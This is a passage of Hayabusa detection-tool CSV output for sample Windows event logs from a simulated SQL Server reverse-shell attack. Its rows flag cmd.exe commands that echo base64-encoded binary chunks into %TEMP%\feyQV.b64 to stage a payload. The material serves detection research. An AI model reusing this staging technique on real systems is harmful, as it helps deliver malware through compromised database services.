AipLex6oAoFBXihA3/opcN/+D4g/B4gIRDQbF00CEkhhpxs+IUP+KVDf/g+I/QDvxipIYxzYAiFD/fJgb+xc78n1fM8mKDD7B6QI7SoqJGMdAADvyiP3/DRQ+dXaD6APB4gRAincZ/kAAiDD/xgA96yu87j4BM9uD4gOKGcHiBMHrBAtvJYr0rMdAAIhQ/4oJg+EPihSNGMdAAIgQQBkAt0CLVeX/AAArwpdez1tdwgwAkDI4kJCQkJCQT4M9WEBBAP8
pDP90JAT/a/jAQDlZw2hL/UEAplhUQQBAdCQM6JcDAABxxAzD/3Qk/qHL////99gbwFn3m0gsnMyLRCQIi0wkEAtLfnskDHUJi2IkBPfhwhAAU/fhi9iLRCQI92QkrgOEi0kkEffhA83PwhAAzMxkzMzMzMzMzMzM/yVAwUAAzIDMzMzMzOPMzFf1U63/i0TaFAvEfUVH>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13b4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:20.951 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xcf8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:21.224 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x824 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:21.498 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xea0 | User: 
Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:21.772 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:22.047 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x121c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:22.320 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell 
(MSF).evtx +2020-08-02 07:58:22.593 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x20 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:22.867 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:23.140 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:23.414 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x82c | 
User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:23.687 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:23.962 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
OjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5Db21wbGV0ZSByZXF1ZXN0czo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JWQ8L3RkPjwvdHI+CgAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlRpbWUgdGFrZW4gZm9yIHRlc3RzOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lLjNmIHNlY29uZHM8L3RkPjwvdHI+CgAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkNvbmN1cnJlbmN5IExldmVsOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+RG9jdW1lbnQgTGVuZ3RoOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4ldSBieXRlczwvdGQ+PC90cj4KAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkRvY3VtZW50IFBhdGg6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+U2VydmVyIFBvcnQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVodTwvdGQ+PC90cj4KAAAAAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5TZXJ2ZXIgSG9zdG5hbWU6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlNlcnZlciBTb2Z0d2FyZTo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JXM8L3RkPjwvdHI+CgAKCjx0YWJsZSAlcz4KAAAAc29ja2V0IHJlY2VpdmUgYnVmZmVyAAAAc29ja2V0IHNlbmQgYnVmZmVyAABzb2NrZXQgbm9uYmxvY2sAc29ja2V0AABDb21wbGV0ZWQgJWQgcmVxdWVzdHMKAABDb250ZW50LWxlbmd0aDoAQ29udGVudC1MZW5ndGg6AGtlZXAtYWxpdmUAAEtlZXAtQWxpdmUAAExPRzogUmVzcG9uc2UgY29kZSA9ICVzCgAAAABXQVJOSU5HOiBSZXNwb25zZSBjb2RlIG5vdCAyeHggKCVzKQoAAAAANTAwAEhUVFAAAAAAU2VydmVyOgANCg0KAAAAAExPRzogaGVhZGVyIHJlY2VpdmVkOgolcwoAAABhcHJfc29ja2V0X3JlY3YAPC9wPgo8cD4KAAAAIExpY2Vuc2VkIHRvIFRoZSBBcGFjaGUgU29mdHdhcmUgRm91bmRhdGlvbiwgaHR0cDovL3d3dy5hcGFjaGUub3JnLzxicj4KAAAAAAAAAAAgQ29weXJpZ2h0>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x840 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:24.236 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe14 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:24.510 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe74 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:24.790 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
ZXF1ZXN0cyAgICAgTnVtYmVyIG9mIHJlcXVlc3RzIHRvIHBlcmZvcm0KAABPcHRpb25zIGFyZToKAAAAVXNhZ2U6ICVzIFtvcHRpb25zXSBbaHR0cDovL11ob3N0bmFtZVs6cG9ydF0vcGF0aAoAADolZABTU0wgbm90IGNvbXBpbGVkIGluOyBubyBodHRwcyBzdXBwb3J0CgAAaHR0cHM6Ly8AAAAAWyVzXQAAAABodHRwOi8vAGFiOiBDb3VsZCBub3QgcmVhZCBQT1NUIGRhdGEgZmlsZTogJXMKAABhYjogQ291bGQgbm90IGFsbG9jYXRlIFBPU1QgZGF0YSBidWZmZXIKAAAAAGFiOiBDb3VsZCBub3Qgc3RhdCBQT1NUIGRhdGEgZmlsZSAoJXMpOiAlcwoAYWI6IENvdWxkIG5vdCBvcGVuIFBPU1QgZGF0YSBmaWxlICglcyk6ICVzCgBhcHJfZ2xvYmFsX3Bvb2wAJWQuJWQlYwAqKioqAAAAACUzZCVjAAAAJTNkIAAAAAAgIC0gAAAAAEtNR1RQRQAAJXM6IGlsbGVnYWwgb3B0aW9uIC0tICVjCgAAACVzOiBvcHRpb24gcmVxdWlyZXMgYW4gYXJndW1lbnQgLS0gJWMKAABDb21tYW5kTGluZVRvQXJndlcAAGFwcl9pbml0aWFsaXplAAAwMTIzNDU2Nzg5LgAwLjAuMC4wAGJvZ3VzICVwAAAAAEk2NGQAAAAATm8gaG9zdCBkYXRhIG9mIHRoYXQgdHlwZSB3YXMgZm91bmQASG9zdCBub3QgZm91bmQAAEdyYWNlZnVsIHNodXRkb3duIGluIHByb2dyZXNzAAAAV1NBU3RhcnR1cCBub3QgeWV0IGNhbGxlZAAAAFdpbnNvY2sgdmVyc2lvbiBvdXQgb2YgcmFuZ2UAAAAATmV0d29yayBzeXN0ZW0gaXMgdW5hdmFpbGFibGUAAABUb28gbWFueSBsZXZlbHMgb2YgcmVtb3RlIGluIHBhdGgAAABTdGFsZSBORlMgZmlsZSBoYW5kbGUAAABEaXNjIHF1b3RhIGV4Y2VlZGVkAFRvbyBtYW55IHVzZXJzAABUb28gbWFueSBwcm9jZXNzZXMAAERpcmVjdG9yeSBub3QgZW1wdHkATm8gcm91dGUgdG8gaG9zdAAAAABIb3N0IGlzIGRvd24AAAAARmlsZSBuYW1lIHRvbyBsb25nAABUb28gbWFueSBsZXZlbHMgb2Ygc3ltYm9saWMgbGlua3MAAABDb25uZWN0aW9uIHJlZnVzZWQAAENvbm5lY3Rpb24gdGltZWQgb3V0AAAAAFRvbyBtYW55IHJlZmVyZW5jZXMsIGNhbid0IHNwbGljZQAAAENhbid0IHNlbmQgYWZ0ZXIgc29ja2V0IHNodXRkb3duAAAAAFNvY2tldCBpcyBub3QgY29ubmVjdGVk>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13c4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:25.064 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9e8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:25.338 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Y2lmaWVkIHNvY2tldCBpbiBwb2xsIGxpc3QuAAAARW5kIG9mIGZpbGUgZm91bmQAAABNaXNzaW5nIHBhcmFtZXRlciBmb3IgdGhlIHNwZWNpZmllZCBjb21tYW5kIGxpbmUgb3B0aW9uAEJhZCBjaGFyYWN0ZXIgc3BlY2lmaWVkIG9uIGNvbW1hbmQgbGluZQBQYXJ0aWFsIHJlc3VsdHMgYXJlIHZhbGlkIGJ1dCBwcm9jZXNzaW5nIGlzIGluY29tcGxldGUAAFRoZSB0aW1lb3V0IHNwZWNpZmllZCBoYXMgZXhwaXJlZAAAAFRoZSBzcGVjaWZpZWQgY2hpbGQgcHJvY2VzcyBpcyBub3QgZG9uZSBleGVjdXRpbmcAAABUaGUgc3BlY2lmaWVkIGNoaWxkIHByb2Nlc3MgaXMgZG9uZSBleGVjdXRpbmcAAABUaGUgc3BlY2lmaWVkIHRocmVhZCBpcyBub3QgZGV0YWNoZWQAAAAAVGhlIHNwZWNpZmllZCB0aHJlYWQgaXMgZGV0YWNoZWQAAAAAAAAAAFlvdXIgY29kZSBqdXN0IGZvcmtlZCwgYW5kIHlvdSBhcmUgY3VycmVudGx5IGV4ZWN1dGluZyBpbiB0aGUgcGFyZW50IHByb2Nlc3MAAAAAWW91ciBjb2RlIGp1c3QgZm9ya2VkLCBhbmQgeW91IGFyZSBjdXJyZW50bHkgZXhlY3V0aW5nIGluIHRoZSBjaGlsZCBwcm9jZXNzAEludGVybmFsIGVycm9yAABUaGUgcHJvY2VzcyBpcyBub3QgcmVjb2duaXplZC4AAFRoZSBnaXZlbiBwYXRoIGNvbnRhaW5lZCB3aWxkY2FyZCBjaGFyYWN0ZXJzAAAAAFRoZSBnaXZlbiBwYXRoIGlzIG1pc2Zvcm1hdHRlZCBvciBjb250YWluZWQgaW52YWxpZCBjaGFyYWN0ZXJzAABUaGUgZ2l2ZW4gcGF0aCB3YXMgYWJvdmUgdGhlIHJvb3QgcGF0aAAAVGhlIGdpdmVuIHBhdGggaXMgaW5jb21wbGV0ZQAAAABUaGUgZ2l2ZW4gcGF0aCBpcyByZWxhdGl2ZQAAVGhlIGdpdmVuIHBhdGggaXMgYWJzb2x1dGUAAFRoZSBzcGVjaWZpZWQgbmV0d29yayBtYXNrIGlzIGludmFsaWQuAABUaGUgc3BlY2lmaWVkIElQIGFkZHJlc3MgaXMgaW52YWxpZC4AAAAARFNPIGxvYWQgZmFpbGVkAE5vIHNoYXJlZCBtZW1vcnkgaXMgY3VycmVudGx5IGF2YWlsYWJsZQBObyB0aHJlYWQga2V5IHN0cnVjdHVyZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAABObyB0aHJlYWQgd2FzI
HByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAAAABO>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x113c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:25.618 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo byBzb2NrZXQgd2FzIHByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAAAABObyBwb2xsIHN0cnVjdHVyZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAAAAAE5vIGxvY2sgd2FzIHByb3ZpZGVkIGFuZCBvbmUgd2FzIHJlcXVpcmVkLgAATm8gZGlyZWN0b3J5IHdhcyBwcm92aWRlZCBhbmQgb25lIHdhcyByZXF1aXJlZC4ATm8gdGltZSB3YXMgcHJvdmlkZWQgYW5kIG9uZSB3YXMgcmVxdWlyZWQuAABObyBwcm9jZXNzIHdhcyBwcm92aWRlZCBhbmQgb25lIHdhcyByZXF1aXJlZC4AAABBbiBpbnZhbGlkIHNvY2tldCB3YXMgcmV0dXJuZWQAAEFuIGludmFsaWQgZGF0ZSBoYXMgYmVlbiBwcm92aWRlZAAAAEEgbmV3IHBvb2wgY291bGQgbm90IGJlIGNyZWF0ZWQuAAAAAFVucmVjb2duaXplZCBXaW4zMiBlcnJvciBjb2RlICVkAAAAAFwAXAA/AFwAVQBOAEMAXAAAAAAAXABcAD8AXAAAAAAAQ2FuY2VsSW8AAAAAR2V0Q29tcHJlc3NlZEZpbGVTaXplQQAAR2V0Q29tcHJlc3NlZEZpbGVTaXplVwAAWndRdWVyeUluZm9ybWF0aW9uRmlsZQAAR2V0U2VjdXJpdHlJbmZvAEdldE5hbWVkU2VjdXJpdHlJbmZvQQAAAEdldE5hbWVkU2VjdXJpdHlJbmZvVwAAAFUATgBDAFwAAAAAAEdldEVmZmVjdGl2ZVJpZ2h0c0Zyb21BY2xXAAAAAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////bnRkbGwuZGxsAAAAc2hlbGwzMgB3czJfMzIAAG1zd3NvY2sAYWR2YXBpMzIAAAAAa2VybmVsMzIAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x568 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:25.896 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x12a4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:26.169 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA